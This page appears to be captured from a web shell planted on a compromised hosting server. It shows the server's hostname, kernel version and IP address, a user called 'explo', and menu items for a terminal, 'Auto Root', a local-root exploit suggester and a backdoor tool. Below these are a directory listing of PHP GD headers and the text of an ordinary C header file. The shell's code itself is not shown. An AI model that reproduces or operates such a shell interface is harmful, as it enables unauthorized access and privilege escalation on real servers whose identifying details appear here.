Linux bear.hostingplus.cl 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
LiteSpeed
Server IP : 192.140.57.17 & Your IP : 216.73.216.38
Domains :
Cant Read [ /etc/named.conf ]
User : explo
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
php51 /
usr /
include /
php /
ext /
gd /
Delete
Unzip
Name
Size
Permission
Date
Action
libgd
[ DIR ]
drwxr-xr-x
2025-07-29 15:19
gdcache.h
2.8
KB
-rw-r--r--
2024-11-08 12:02
gdttf.h
461
B
-rw-r--r--
2024-11-08 12:02
php_gd.h
5.88
KB
-rw-r--r--
2024-11-08 12:02
Save
Rename
/* $Id: gdttf.h,v 1.3 2000/02/26 03:20:50 zeev Exp $ */ #ifdef _OSD_POSIX #ifndef APACHE #error On this EBCDIC platform, PHP is only supported as an Apache module. #else /*APACHE*/ #ifndef CHARSET_EBCDIC #define CHARSET_EBCDIC /* this machine uses EBCDIC, not ASCII! */ #endif #include "ebcdic.h" #endif /*APACHE*/ #endif /*_OSD_POSIX*/ char * gdttf(gdImage *im, int *brect, int fg, char *fontname, double ptsize, double angle, int x, int y, char *str);